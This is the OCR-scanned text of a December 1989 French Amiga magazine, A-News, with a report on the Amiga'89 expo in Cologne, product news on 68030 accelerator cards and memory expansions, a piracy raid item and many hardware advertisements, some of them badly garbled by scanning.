Sponsors

FacebookTwitterGoogle Bookmarks

Voilà où en était l’Amigamania à Cologne le 11 novembre 1989. A trois heures de l’après-midi il y avait encore des Amigafans en attente devant la porte (mais les français ont pu entrer grâce à l’intervention de C 5 et Commodore). Nous espérons que l'année prochaine les organisateurs (Commodore Allemagne, Amiga Magazin de Markt & Technik, et AmiEXPO des Etats-Unis) mettront à profit l'expérience de cette première expo européene et réserveront une halle bien plus grande avec, surtout, des allées plus larges. Parce que une chose est d’ores et déjà certaine: l’expo sera de nouveau à Cologne du 9 au 11 novembre l’année prochaine. Auf Wiederschcn ! Etant donné le temps limité, les mauvaises conditions de travail et notre aversion pour les foules, même les foules d’Amigamaniaques, nous n'avons pas tout vu à Amiga’89 - loin de là. Pourtant, nous avons trouvé des choses bien intéressantes...par exemple Une boîtier externe pour 500 et 1000 avec 68030 à 50MHz... Un disque dur INTERNE pour Amiga 500... Un projet pour un Amiga laptop.. En Avant - Le monde du 68030 L’atout majeur de l’Amiga est que la machine de base est équipée de possibilités supérieures en son, couleur, animation et vidéo, ce qui permet une progression régulière en puissance, en ajoutant des périphériques et extensions. Ce n’est pas le cas des Macintosh, ST et IBM. Pour la majorité de possesseurs d’Amiga les extensions primaires sont la mémoire et un disque dur. Mais avec la chute des prix de ces deux produits de plus en plus d’Amigaîs- tes en sont déjà équipés et se préparent pour la prochaine montée en puissance - l'installation d’un processeur et mémoire 32-bits. Des trucs et astuces pour le chemin à suivre feront le sujet d’un prochain article dans A-News. En attendant, la choix en France semble limité à deux cartes - la carte 68020- 68881 de Commodore, qui équipe d’origine l'Amiga 2500. Et la carte 68030-68882 de 89 GVP distribuée par CIS de Bordeaux.

Click image to download PDF

Document sans nom AMIG fNEWS L'ORDINATEUR POUR LES M CREATIFS ISSN 0989-5451) Vas-y Yeti montre-moi comment tu es rentré en premier.... .
20 Suisse : 5.80 Canada : 4.95 Belgique : 14.
794584020000 00200 GREAT VALLEY PRODUCTS INC. IMPACT SCSI RAM : carte multifonctions intégrant un contrôleur SCSI et une extension mémoire 2 MO.
• Autoboot en standard sur partition FFS.
• Transfert DMA 16 bits via un buffer de 16 Ko sur la carte
offrant de hautes performances sans interactions avec la DMA de
l'Amiga.
• Connecteur SCSI externe compatible Macintosh.
L’installation des produits GVP est extrêmement simple et ne demande que quelques minutes.
Toutes les cartes GVP sont accompagnées dun manuel et dune disquette d’installation en Français.
LE CHOIX DE LA PUISSANCE VITESSE Processeur 68030 et co-processeur 68882 cadencés à 25 MHZ.
PUISSANCE Carte d'extension mémoire RAM 32 bits 4 8 Mo s'entichant en piggy-back sur la carte 68030 (l'ensemble n’utilise que le connecteur CPU de l'Amiga). Support total du mode BURST du 68030, permettant un accès à la RAM 32 bits sans états d’attente, même à 25 Mhz I INTEGRATION contrôleur de disque dur intégré ultra rapide accédant directement au bus 32 bits du 68030.
Votre disque dur n’occupe donc pas de connecteur supplémentaire.
QUALITE C'est un produit GVP !
Votre Amiga est une machine fantastique, vous en avez la Certitude ' Passion ! Cela ne suffit plus !
Vous avez Y Innovation, mais pour dépasser les limites, pour explorer de nouvelles ressources ... il vous faut la Puissance !
Liste des revendeurs sur simple demande Les produits GVP sont distribués en France par: CIS 571, cours de la Libération 33400 Talence Tel: 56 374 378 Fax: 56 040 895 Extensions Hautes Performances pour Amiga 2000 Amiga. Macintosh et Impact sont des marques déposées de CommodoroAm»ga. Apple Computers Inc et Great Valley Products inc respectivement Photos et caractéristiques techniques non contractuelles.
1 l'AMIGA S00 »i li MOMt VIDEO KII dam tau, cnaiioaaeawa! .dio 3 laumtohoa d u* d*»m lafotmaligua dam un, itquaait tlddo 2 GtntciQut il liirog* qbtqnui sut 1 logliiili iadai dam li HOME VIDEO KII 4 Un dm nombnui iHltt tpdllam rtoluabll d poilu du HOME VIDEO KIT Adresse.
S&S$ b!
Avec IÂMIGA, micro-ordinateur répondant S sur 5 oux exigences de la vidéo, et HOME VIDEO KII : tonus plein écran pour vos productions.
Vos bondes vidéo deviennent de véritables films de production personnalisés à votre convenance. Vous créez vous-même vos génériques, vos titrages, vos incrustotions, mixages et effets spéciaux, le HOME VIDEO KII permet de mixer des images informatiques créées sur votre AMIGA avec d'outres provenant d'un comescope (PAL SECAM) et de les enregistrer sur votre mognétoscope (PAL SECAM).
Il est livré avec 3 logiciels pour réoliser vos titrages, vos génériques avec un choix de 35 polices de caractères, et vos effets spécieux comme les volets d'apparition.
L option DIGIVIEW vous permet en plus de numériser des images pour les retravailler et les stocker sur ordinateur.
Avec le HOME VIDEO KIT ossocié à lo puissonce de l'AMIGA devenez le créateur vidéo de vos souvenirs.
J désire recevoir une documentation sur: ? AMIGA 500 ? HOME VIDEO KII z COMMODORE -152, Avenue de Verdun, 92137 ISSY LES-MOULINEAUX " MINITEL 3614 Code COMMODORE : liste des distributeurs et demonde de documentation.
CARTES D’EXTENSION MEMOIRE SI= lf?IT INTERNES POUR AMIGA 500 -«y- Pour répondre précisément à vos besoins, les cartes SPIRIT TECHNOLOGY permettent de configurer la mémoire de votre AMIGA 500 de 512 Ko à 3 Mo avec ou sans horloge.
SPIRIT SC501 L’installation des IN500 (0 à 1.5Mo) et IN500S2 (0 à 2Mo) est très simple, sans soudure ni modification, et ne condamne pas l’utilisation de la SC501 ou de l’A501 de COMMODORE.
Les cartes SPIRIT TECHNOLOGY sont les extensions de plus de 512Ko les plus vendues en France; leur installation par un revendeur agréé préserve la garantie COMMODORE de votre AMIGA. Elles sont garanties 1 AN et livrées avec une notice en français.
Jusqu’au 31 12 89, chaque IN500 et IN500S2 est livrée avec une housse de protection pour A500 siglée AMIGA et munie d’une poche pour la souris 571, Cours de la LIBERATION 33400 TALENCE - FRANCE - TEL: 56 374 378 - FAX: 56 040 895 SPIRITIN500-S2 STIQUES NON CONTRACTUELLES - AMIGA EST UNE MARQUE DEPOSEE DE COMMODORE AMIGA | SPECIAL AMIGA AMIGATeX DES SOLUTIONS LE LOGICIEL DE VIDEO COMPOSITION ADAPTEES A TOUS LES BESOINS ET DE MISE EN PAGE DE L'IMPOSSIBLE: EXEMPLE FORMULES MATHEMATHIQUES SCANLOCK ET SCIENTIFIQUES, TABLEAUX, VIDTECH PAL GRAPHIQUES, GRILLES DE MOTS CROISES,... ENFIN UN GENLOCK PRO
A PRIX SYMPA 10 DISQUETTES (1500 fontes) :1600 F 14 500 F Drivers imprimantes (8 disquettes) : 800 F Disquette de démonstration contre 50 F en timbre ou PAL COMPOSITE (8mm, U-matic, BVU) chèque (remboursés en cas d’achat) COMPOSANTE Y C (S-VHS - M2) AMIGATgX est une exclusivité FONDU VIDEO & AMIGA en face avant ESSONNE MAILING QUALITE "BROADCAST" Revendeurs, contactez-nous EN DEMONSTRATION PERMANENTE NOTRE LE CERCLE AMIGA COMPETENCE MIEUX QU’UN CLUB PAS DE DROIT D’ENTREE FAIT NOTRE DES PROMOS ET PRESTATIONS HAUT DE GAMME SUCCES MIAMI DES REFERENCES NATIONALES LE MAGAZINE AMIGA REGIE VIDEO A
AIR FRANCE DES NOUVEAUTES TOUT ABONNE A 10% DE REMISE PAO AU GROUPE HACHETTE IMAGES DE SYNTHESE AGENCE SYGMA CATALOGUE GRATUIT SUR DEMANDE LA RECHERCHE DE L’INNOVATION AMIGA 2000 CARTES TRANSPUTER VIDEO TOASTER + A 1084 P + CARTE 68030 CONTACTEZ-NOUS POUR CES PRODUITS 25 900 F ESSONNE MAILING (DISTRIBUTEUR & CENTRE TECHNIQUE AGREE COMMODORE) 3, Impasse JULES DALOU (Quartier des Epinettes) 91000 EVRY
64. 97.96.54 - Fax: 69.91.19.25 Encart composé sur Amiga avec
Professional Page, tiré sur laser NEC LC890 EDITO Ca fait du
bien de visiter l’Allemagne et de voir une grande halle
pleine à craquer d’enthousiastes de l’Amiga. Cette première
expo européenne dédiée exclusivement à notre machine a
sûrement fait beaucoup de bien pour le moral, sans parler du
bien qu’il a du faire à certains portefeuilles.
Les américains ont pu voir que le marché européen, même s’il est quelquefois gêné par la disparité des langues, a une autre allure que le marché américain.
Il est plus compact, plus concentré, plus organisé, et plus important.
Ceux qui ont essayé de trouver un revendeur Amiga à New York ou à Los Angeles comprendront ce que nous voulons dire. Même ici en France, où le nombre d’Amigas est beaucoup plus restreint qu’en Allemagne, on trouve dans beaucoup de grandes villes des spécialistes-revendeurs qui sont eux-mêmes enthousiastes. De ce point de vue, nous avons de la chance.
Vous verrez sur la page 35 que le prix d’abonnement sera augmenté à partir du 10 janvier. Si ça vous intéresse de vous abonné, depêchez-vous de le faire maintenant à l’ancien prix.
Et a vous tous, abonnés ou non, bonnes fêtes.
SOMMAIRE NEWS NEWS NEWS .6-7 EXPO AMIGA’89 .....8-11 LA TRAME DU YETI ...12 LA PORTEE DE A-NEWS ......14 VIRUS BGS9 ..16 LIVRES 18 MAGAZINES ALLEMANDS ..19 TEST DISQUETTES HERMES ......20 LAMER EXTERMINATOR .....21 DESASSEMBLAGE LAMER ’ .22 LA 3-D PART
III .....24-25 SHELL POUR DEBUTANTS .26 INTRODUCTION AU BASIC 30 RAPIDO ASSEMBLEUR ..... 26-27 DEMO DU MOIS ....33 LE COIN C ......34 LIVRE : C AVANCE ....35 GREAT COURTS SIM CITY ..36 SWORDS OF TWILIGHT INDIANA ......37 DOMAINE GRAND PUBLIC ......39 COURRIER .42-43 DP SUR
DEEP ..44 PETITES ANNONCES ABONNEMENTS 45 Notre Couverture Ramon et YETi en 3-D par Frédéric Boullier Copyright NewsEdition, 1988. Reproduction Interdite sans autorisation. Amiga, Amigados, Workbench sont des marques déposées de Commodore Inc. Les articles n’engagent que leurs auteurs Ce numéro a été mis en page sur Amiga 2000avec 3 mégas RAM (carte A2058 de Commodore), disque dur Quantum 40 mégas (cane GVP), cane Flicker Fixer, moniteur monochrome NEC multisync GS, les logiciels Professional Page, Deluxe Paint III, Prowrite 2, QED, Dmouse,
Butcher, Quarterback et l’imprimante LaserWriter A-News est édité et publié par NewsEdition SARL de Presse à ZABlis.24500Eymct. Tél 53-23-76-16 53-58-71-46 FAX532375-35.
Directeur de la Publication.
Bruce Lepper AMIGA NEWS Titus Software nous communique que quatre personnes de la société ont participé dans un raid avec la police néerlandaise sur un "copy party". Selon Titus le party de 350 personnes à Nistelrode au Pays Bas était organisé par des responsables des groupes pirates de sept pays La communiqué de Titus décrit comment certains participants, pris de panique en voyant la police, ont "commencé à lécher leurs étiquettes pour faire disparaître les noms et à sauter à pieds joints sur leurs disquettes."
Deux actions ont été menees conjointement par l’Agence de la Protection des Programmes (APP) et Titus:
- une action pénale visant à constater et à faire reprimer "les
délits commis par les pirates français”;
- Une action civile destinée à faire constater par huissier la
presence de produits Titus contrefaits durant la copy-partie
aux Pays-Bas.
Ces actions ont suivi la découverte par Titus que Knight Force, un jeu d'aventure développé par la société, circulait dans les milieux pirates avant sa sortie commerciale.
* * * CompTec propose ce boîtier qui permet de partiellement
transformer votre 500 en 2000 (voir photos). Le boîtier
ressemble à celui d'un 1000 en plus large. A l'intérieur il y a
de la place pour 2 drives 3 1 2 et un disque dur 5 1 4 ou deux
en 3 1 2 plus une carte de 4 série de slots 2000, AT et XT. Il
manque le slot vidéo et le slot CPU, il n’est donc pas possible
d’utiliser un flicker fixer classique (mais par contre le
nouveau Flick- Off de MAST). Votre ancien clavier est monté à
l’intérieur d’un boîtier de clavier pour A2000. Existe en deux
versions : complet avec slots 2000 et alimentation plus
puissante au prix de 698DM (environ 2400F) ou sans les slots et
l’alimentation au prix de 398DM (environ 1400F. Dans ce cas si
vous avez déjà une extension sur le bus de votre 500 elle peut
être conservée et mise à l’intérieur du boîtier. A Cologne nous
étions impressionnés par la qualité de finition de ce boîtier
très élégant (Comptée, Obermôrmterer Strasse 1, D-4192 Kalkar4,
Allemagne Fédérale, tél 0 28 24 38 67, fax 0 28 24 44 35.
Dans la série des gadgets folkloriques à Amiga '89 à Cologne (vu le prix peut on vraiment qualifier cela de gadgets?) Il y avait aussi de boîtiers transparents ou noirs pour monter son 2000 en tower, des carosseries de 500 entièrement noires, et une foule de petits accessoires qui nécessiterait 40 pages rien que pour vous en parler.
Par exemple: le Time Control Center qui récupère le signal émis par l’horloge atomique située en Allemagne et remet votre Amiga à l'heure. Prix environ 250
DM. C'est cher pour avoir une heure précise. De plus cela
fonctionne bien dans le nord de la France mais de plus en
plus mal au fur et à mesure que l’on s'éloigne de l'émetteur.
* * * Le AX.S de Spirit Technology, une unité d’expansion qui
s’attache sur le bus de votre Amiga 500 ou Amiga 1000, ne
transformera pas votre Amiga en station compatiblc-PC comme
nous avons indiqué le mois dernier. Mais avec ses sept slots
XT- AT, et baies pour lecteurs de 3" et 5” et des interfaces
logiciels elle permettra l’utilisation de cartes et
périphériques au standard PC. L’AX.S sera vendu avec software
dri- vers pour certaines cartes et accesoires et avec le AX.S
Resourcc Library Software pour la création d'autres drivers. Le
Resource Library sera aussi distribué sur les reseau du domaine
public.
Encore des baisses de prix pour certains produits distribués par CIS: la carte SC501 (équivalent A501) baisse de 1490F à 1190, la carte mémoire interne Spirit IN500 en 1.5 mégas baisse de 3990F à 3190F, et la Spirit IN500 S2 en 2 mégas baisse de 5990F à 4850F.
Côté sonore, la nouvelle version (hard et soft) 3.0 du digitaliseur Perfect Sound sera disponible en décembre. (CIS, 571 cours de la Libération, 33400 Talence, tél 56-37-43-
78)
* * * Mr A. Dietrich de Schouette Informatique annonce qu’à
partir du début Novembre il est distributeur exclusif des
produits Gigatron en France, Luxembourg, Suisse, Italie et
Australie. Parmi les produits annoncés par Chouette on remarque
les cartes-mémoire Minimax pour A500 et une carte mémoire de 2
mégas extensible à 8 mégas pour A2000 au prix de 3458FTTC.
Chouette Informatique s'est installé au Clos du Hibou, F-67340 Weinbourg, tél 88-89-52- 41, télécopie 88-89-52-30.
* * * Nous avons appris qu’il existe un dictionnaire
international pour WordPerfect, y compris un dictionnaire
français. Renseignements chez WordPerfect France (tél 1-39-
51 -78-88). Le prix en Suisse est 210 FS.
* * * La société Sharp vend un mini-scanner couleur pour Amiga,
le JX-100. Il peut digitaliser une image de 4 x 6 pouces avec
une définition d'environ 200 dpi (8 points mm) et peut
reconnaître 16.8 millions de couleurs. D y a aussi un mode
monochrome et un mode pour capter 256 niveaux de gris (data
sorties de 1, 4 et 6 bits pixel).
Le scanner pèse 1.6kg. Il utilise un sen- sor CCD en combinaison avec trois filtres, rouge, vert et bleu (son grand frère le Sharp JX 50 utilise un sensor CCD avec trois lampes fluorescentes RVB). En mode dilher il capte une image couleur en 60 secondes, une image monochrome en dix secondes.
Son système de visualisation de l’original permet une alignement facile de l’image à scannériser. Prix $ 995 (Sharp Corp. Mahwah, New Jersey 07430-2135, tél 201- 529-8200).
AMIGA
* * 4= Le Livre de Superbase (Micro Application, 169F) explique
l’utilisation et fonctionnement de SuperBase Professional,
Superbase 2, et Superbase Professional 3.
Raoul en reparlera, mais notons les différences entre SBPro et la toute dernière version, SBPro 3, qui sortira bientôt en français chez Micro Application.
- La fonction relationnelle est beaucoup plus flexible;
- Importe et exporte davantage de formats de fichiers, y
compris dBase III plus, Lotusl23 et DIF
- Communication par câble série ou par modem pour transférer des
fichiers ASCII ou Superbase entre deux machines équipées de la
même version de Superbase;
- Editeur de masques plus puissant;
- Langage DML renforcé, y compris commandes de gestion de la
souris permettant la gestion des programmes style
"hypertexte".
* * * Amiga’89 était une expo très "hard" (voir reportage plus
loin), les logiciels en Allemagne ont tendance à être en langue
allemande, ou bien à'etre les mêmes bons vieux programmes en
anglais que nous connaissons si bien en France.
Sur le stand GFA on pouvait néanmoins admirer le tout nouveau GFA assembleur, qui comme son grand frère le BASIC paraît fort intéressant. D s'agit d’un macro assembleur qui permet également l’utilisation de fichiers include comme en C. Nous attendrons la sortie en français de ce produit pour vous en parler plus en détail, mais à priori il s’agit d'un lool kit complet comme le DEVPACK. Il comprend un éditeur, que j’espère meilleur que celui du BASIC, un assembleur, un linker et un débogeur.
John Tocbes de Lattice, qui ne présentait que la version 5 du célèbre compilateur, nous a promis une version du C++, langage "pre-processeur" orienté objets qui génère du code source pour Lattice 5.0, et qui devrait intéresser davantage le monde professionnel que la grande majorité des utilisateurs du langage C. A+LAG présentait le Modula-2 CM2Amiga), il s’agit en fait d’un Pascal Cisé (ou le contraire) mais qui devrait plaire à tous les nostalgiques du Pascal. (A+Lag, Dàderiz 61, CH-2540 Grenchen, Suisse, tél 0041-085-520-311) Gold Disk à montré Professional Page
1. 3 en sa version allemande. La version anglaise est en vente
aux Etats Unis. La sortie sur imprimante matricielle semble
enfin égaler les sorties de son concurrent PageStream.
Ue son ouiiouiiciii Page Voici un échantillon de sortie PP1.3: Ready Soft présentait la démo de Space Ace, la suite de Dragon's Lair. Ca va encore faire très mal au porte-monnaie de certains d'entre vous. A titre indicatif vous devrez cette fois ci combattre un méchant extra terrestre, qui, non content d'avoir enlevé votre tendre et chère, se propose de transformer les habitants de la terre en enfants.. VOUS RECHERCHEZ... VOUS PROPOSE AMI6A AUDIO DI6ITIZEI Les TRUMPCARD sont «petites» en prix et «grandes» en performances.
PrixMSF.
Prt. 495 F. Prix *0F.
Pru 45 F. rBUMPCAID A2000I dt*qoe dur SCSI GARD» Mot tvtfa avec les ROMs A mo in i wo ovrrmtfîu [OJ S£dL£UîN7 445 F.
14. 490 F. 11410 F. 1390 F. 780F IMPRIMEZ?!
Tt second port paiaBùe (de sonie u QUALITE. SIMPLICITE. FIABILITE coMrowvv«w.Mt w nvi •• • _¦ uinrwi. ¦,. ¦ • _ [CR15 BON DI COHUANDC BUS PLUS A ENVOYEZ AVEC VOTRE REGLEMENT AMIGA BUS PLUS NOM
41. Rue Barraull l'i 75013 PARIS CONTACTEZ-NOUS au ( I )
45-80-05-66 REVENDEURS CONSULTEZ-NOUS Nous sommes à VOTRE
DISPOSITION Od.i CrtG • EXPEDITIONS COLISSIMO DANS TOUTE LA
FRANCE VILLE Tel |t) 45 80 05 66 taire de configurât!» TC
UTILS 13).
..... 270 F. DISQUE DUR SCSI TRUMPCARD CARTF. CONTROLEUR TRUMPCARD SCSI ET DISQUE DUR SCSI 30 MO SEAGATE ST138N (40mü 6990 F. 40 MO QUANTUM PROORIVE (19ms| 7230 F. 48 MO SEAGATE ST1S7N (40m) 7300 F. 60 MO SEAGATE ST177N (2SmO 10300 F. 80 MO QUANTUM PROORIVE (19ms) 11400 F. HC10CQ 100 MO CONNEfi CP31C0 2Sro| 14500 F. AMOVIBLES EXTERNES SYQUEST é avec 2 cartouches .... RS AMOVIBLES INTERNE ré a*ec 2 cartouches .... K PACK (cartoucte 40 MO amovible) TRUMPCARD contrôleur dur SCSI. Bottier 2700 F. les TRUMPCARDS sont Iwrées avec les ROMs AUT0300T et rt de configt,
raton TC UTILS 1.3. TRUMPCARD 500 3) 30 MO SEAGATE ST13SN (40m) 7500 F. TRUMPCARD 500 4ùQ 40 MO QUANTUM PROORIVE (19m) 8550 F. THUWCARD M0 M 60 MO SEAGATE ST17 N (28m.) TOflOO F TRUMPCARD S0O 80Q 80 MO QUANTUM PRODRIVE 119ms) 11940 F TRLM’CARD SOO IOOQ 100 MO CONNER CP31J0 l2Scm| 11250 F La cane dotcnikie RAM O Wol State Unfae de. Modules mémjtre SIMM. M«ta4 cri disponible en 512 K. 1. 2, et 4 MEGv Carte demllongueu équipée du .SMART RETRESH-, système exclut) T1VS Une carte peuplée 4 MEGs tir» moins d'1 Ampère.
TRUMPCARD Cane contrôleui SCSI. • Vaesse de transfert mesurée à plus de 400 KO Mt • Equipée de ITVS SMARTBOOT Permet lAutoboot à froid de tous les disques durs 'Logiciel de formatage en «chccklèst*. Transforme piaJuts TFUMPCAJtD auuGxAeot dêrcCrmm.
Avec if disques durs imovèks SYQUEST 1850 F. sa et 30 MO de Mémoire TRUMPCARD 500 30 MO ...... 11950 F.’ Cette contrôleur SCSI Autoboot disque du r 33 MU (4üms|, monté for- mué, testé. • META4 (peuplée 2 MO) - Bober
• le* tou. Actotés séparèn** 1J340 F. Vcvs ne pouvez acheter
(ensemble immédûtement en l teule fois BUS PLUS pense S vous
Vctre pnorté ces! Le disque dur 6990 F avecbcèter (au lleude
7.500F Vcus choisissez !a Ram META4 (peuplée 2 MO) 6590 F avec
boîtier au beu de 6890 F. , BUS PLUS vous oflre un espace de
fcberté, veus disposez d. 5 mob pour ocquén. Rauii« élémeni
IVS. ET BUS PLUS VOUS GARANTÎT LE PRIX DU PACKAGE PENDANT S
MOIS** "Sur baw JSO isni Ot’tc vala&e pjsqu*j 3vn?«9 pou
l’aenat du pam*» ètém ¦ UTILISEZ UN DISQUE DUR avec A-MAX11
IVS A-MAX (logiciel de .
Formatez votre dsque dur AMIGA DOS) AvcdVS, ¦*£ rtBkm MAC-AM1GADOS et PC (sous ut la carte contrôleur A-MAX VEC DIRECTEMENT SUR LE MEME H EN SUR é vous faut TRUMPCARD "lu crogrammev * to REAO50F7 n’y *or» P*s parverxj IVS A-MAX H VOUS DIGITALISEZ.
IVS vous offre la Ai te PRINTERFACE plus besoin reconnecter tes cables des tmjrimai puis imprimer. Rus de perte de temps ¦ TRUMPCARD 50C-META4I BUS FUIS *xa prçœ ta COTE EXTENSION U0i R£ MIUKS0 MEGS ÔJ M ASJ. • Exiensoi n»ic pejp*« de Cfisnx l Meq. I*ye «- arraten a* rédj* (FORMAT. Tote dakrtenei.)
HORLOGE pxx SelMMENT 1.195 F. BUS PUIS vous prepeœ U cane MICRDBXTI1CS 8+IP ! (2.4.6 8 MO) 8 UP1 pupéo 2 UO nous consulter 8UP ' D KO for SEUllUENJ 2100 F. 1 BUS PUB vous preço» la CARTE EXTENSION MEMOIRE MINMEGS de UAS.T. • Edcrocn Oûerre nmetst p» MM W AtXO (XV SEULEMENT 5*50 F. ffW mi te» pm« SU * * i uoi 'BUSPJISwuTOœlelECIElJRÜNeHVE 3.5 Su«» an ne a» Sf«£*C.v7 i.iso F. I BUS PUIS *u irara » GenW* Astf (UK). Sert» P»i CXM SEULEMENT 1795 F. INTERFAX UO 2 : Uxue t MIC» IN. I MIC» THéSj i wiD 0UT. 2 peso UlD OJT THRU (XXTyruatiles par rtffT&px COJ saJemert 510 F Lecteur d« (Jaquette com»Dble
MAC poe se connecter X Tamlo* svoe acheté Tensetcble A-MAX.
De cfté l’hardwart FOMS Applo BUS F1US vos propose Inertac» Mi01.| MINI AMP Amplificateur Audio H rwMOH mm Wt «ortir. Rlfio d* rAMKiA.
MINI AMP 3 1 HiX AMPU ««. Amp 3 • 1 Cat£ Aadn Amq.
• I B*n«J xm*Mur • Se r»W l vot h*u! PrWtrt ou à t» catqu. BaUdeu
Pru *90 F. MINI AMP 4 U Hr. Anp 3 6ja*é de 2 SLPER NMMIUS MM
ENCEINTES Pro S30 F MINI AMP S U Mm Anç 3 4q*é de 2 ENCEINTES
DE BBUO TKEQUE ;i 3 h*j prWunJ QUAUTE SUPER HI-FI Pra 895 F
BOOT SELECTOR Vous chotrisso» da honter A partir de DF0 DF1 ou
DFO DFL Installation facile Prix 125 F CHOISISSEZ ENTHE VWS10N
* OU STEREO La detu AMIGA rarérur K IrfquerxB de âguftucot
ilinl|usquT 60 Mhz n lonctcn dv soét utfaé nd.wrdtrg.uaW MONO
«ne Ww. Wbk. Sound . Cent e do «w. Démo d-AüdnocMOo rt Wccl ON
NE VOUS OUBLIE PAS C0NTACTE7. N0US DE BONNES NOUVELLES VOUS
ATTENDENT SOUND VORKSHDP (daqurilr) AWPTATEUR POCR AHWO nuac*
rom TOUl cneoue «MONO Une Grande Première La première
exposition européenne dédiée exlusivement à 1* Amiga était un
grand succès, avec 35 000 visiteurs, trois fois plus que les 10
000 habituels des shows américains.
AMIGA On peut dire que les gens se battaient littéralement (en fait il n’y avait qu'une seule personne qui s’énervait réellement) pour entrer dans la halle d’exposition à Cologne, Allemagne Fédérale, mais cela s'explique par le fait que les organisateurs avaient sous-estimé l’assistance.
Le premier jour, le vendredi 10 novembre, il était possible d’entrer plus ou moins normalement dans la halle 6 de Koln Messe (Cologne Convention Cerner), quoique une fois à l'intérieur beaucoup de stands étaient inaccessibles, déjà bloqués par une masse de sardines verticales dans des ’colloirs’ trop étroits.
En revanche, pas de problème pour repérer des stands intéressants... Le samedi, la situation devenait dramatique. Un groupe de journalistes et développeurs français arrivé par avion le matin dut patienter pendant une heure, malgré leurs cartes VIP, derrière une foule de plusieurs milliers d’Amigaïstes.
Ed:, se croyant à Berlin dans les années soixante, a fait le tour et sauté la grille (aïe), puis est passait sous le nez des gardes pour aller demander aux organisateurs de laisser passer ses compatriotes.
La réponse: "Impossible. La halle est bourrée. Les autorités nous interdisent de laisser entrer davantage de gens tant qu’il n'y en a pas d’autres qui s’en vont.
De toute façon, si on on les laisse entrer devant la foule ils vont se faire tuer”.
Voilà où en était l’Amigamania à Cologne le 11 novembre 1989. A trois heures de l’après-midi il y avait encore des Amigafans en attente devant la porte (mais les français ont pu entrer grâce à l’intervention de C 5 et Commodore).
Nous espérons que l'année prochaine les organisateurs (Commodore Allemagne, Amiga Magazin de Markt & Technik, et AmiEXPO des Etats-Unis) mettront à profit l'expérience de cette première expo européene et réserveront une halle bien plus grande avec, surtout, des allées plus larges. Parce que une chose est d’ores et déjà certaine: l’expo sera de nouveau à Cologne du 9 au 11 novembre l’année prochaine.
Auf Wiederschcn !
Etant donné le temps limité, les mauvaises conditions de travail et notre aversion pour les foules, même les foules d’Amigamaniaques, nous n'avons pas tout vu à Amiga’89 - loin de là. Pourtant, nous avons trouvé des choses bien intéressantes...par exemple Une boîtier externe pour 500 et 1000 avec 68030 à 50MHz... Un disque dur INTERNE pour Amiga 500... Un projet pour un Amiga laptop.. En Avant - Le monde du 68030 L’atout majeur de l’Amiga est que la machine de base est équipée de possibilités supérieures en son, couleur, animation et vidéo, ce qui permet une progression régulière en puissance,
en ajoutant des périphériques et extensions. Ce n’est pas le cas des Macintosh, ST et IBM.
Pour la majorité de possesseurs d’Amiga les extensions primaires sont la mémoire et un disque dur. Mais avec la chute des prix de ces deux produits de plus en plus d’Amigaîs- tes en sont déjà équipés et se préparent pour la prochaine montée en puissance - l'installation d’un processeur et mémoire 32-bits.
Des trucs et astuces pour le chemin à suivre feront le sujet d’un prochain article dans A-News. En attendant, la choix en France semble limité à deux cartes - la carte 68020- 68881 de Commodore, qui équipe d’origine l'Amiga 2500. Et la carte 68030-68882 de 89 GVP distribuée par CIS de Bordeaux.
GVP tenait un stand imposant à Cologne, et on pouvait y voir ces deux cartes concurrentes en action côte-à-côte.
Evidemment, si GVP avait pris la peine d'organiser cette démo, les résultats, on pouvait i’imaginer, seraient en sa faveur.
Effectivement, l'A2000 équipé de la cane GVP 3001 avait entamé le calcul d'un image Sculpt 4D pour la quatrième fois avant que l'A2500 affiche l’image pour la première fois.
Combien d’or faut-il mettre de côté? La carte Commodore avec 2 mégas (extensible à 4 mégas) de Ram 32-bit et cadencé à
14. 28MHz est au prix de 14800FTTC, et la cane GVP avec Ok
(extensible à 8 mégas) mais incorporant une interface disque
dur de type AT super-rapide est à 14980 TTC (une baisse
d’environ 1000F est intervenue en novembre). Le prix de la
carte GVP avec 4 mégas de 32-bit ram sur carte-fille est
36590FTTC.
GVP travail sur une version 33MHz de leur carte, ce qui implique l’utilisation de versions plus rapides des processeurs et circuits mémoires.
Sur un stand un peu plus loin nous étions surpris de voir une société allemande en train de vendre des cartes GVP "bricolées" cadencées à 32Mhz, 36MHz, et 40MHz. Le technicien de X-Pert Computer Services nous assurait que ces cartes fonctionnait parfaitement, y compris en "burst mode” avec 80ns RAM jusqu’à 36MHz, mais qu’à 40MHz "ça marche sur certains Amiga mais pas sur tous”. Les techniciens de chez GVP, quant à eux, étaient sceptiques sur le fonctionnement correct du burst mode dans de tels circonstances et faisaient remarquer que l’acheteur d'une carte modifiée par X-Pert ne
bénéficierait pas de la garantie GVP.
Les possesseurs d'Amiga 500 et Amiga 1000 ne sont pas oubliés dans la course vers la puissance...MAST était présent avec la fiche technique (mais pas le hardware) sur "The Infinity Machine" (titre très modeste, n'est-ce pas?).
L’Infinity Machine ne 899 700 630 1290 NC 890 4410 950 1995 509 859 2500 759 679 1770 1290 DPAINT III DVIDEO 1.2 PAL PHOTOLAB PHOTON PAINT II DIGI-PAINT III DESIGN 30 ANIMATE AD INTERFONT DIGIVIEW GOLD FANTAVISION TVTEXT PROVIDEO ANIMAGIC THE DIRECTOR PRO. DRAW PAGEFLIPPER FX KICK OFF FLIGHT SIMULA.
RICK DANGEROUS SCENARY EUROPE NORD ET SUD INDY AVENTURE RVF HONDA GREAT COURTS PICTIONARY 8LOOD WYCH POPULOS SCRABBLE BON A RETOURNER A MAD (adresse ci-dessus) NON : ..PRENOM : ADRESSE : D Envoyez-moi ma MAD'CARD; ci-joint une photo et 2 timbres à
2. 20 F O Envoyez-moi par retour votre catalogue ainsi que votre
tarif général.
Sera peut-être pas immortelle mais elle a un profil alléchant (sur papier), et les gens de MAST prétendent avoir déjà 15 000 commandes.
Voici les détails: L'Infinity Machine de base n’est qu'une boîte, similaire en taille à celle du disque dur externe Tiny Tiger vendu par MAST, à l’intérieur de laquelle on trouve une interface SCSI et la logique pour soutenir une série de modules supplémentaires, y compris 32-bit RAM, une cache de RAM statique, un 68000 cadencé à 16MHz ou un 68030 cadencé de 16 jusqu’à 50MHz, un 68882, un rom Kicksiart (pour A1000) et alimentation optionnelle.
Le prix prévu pour ce boîtier de base est 699 DM (environ 2000F) pour le modèle pour A500 A1000. Disponibilité est prévu pour Janvier, et un modèle pour le A2000 suivra un mois plus tard.
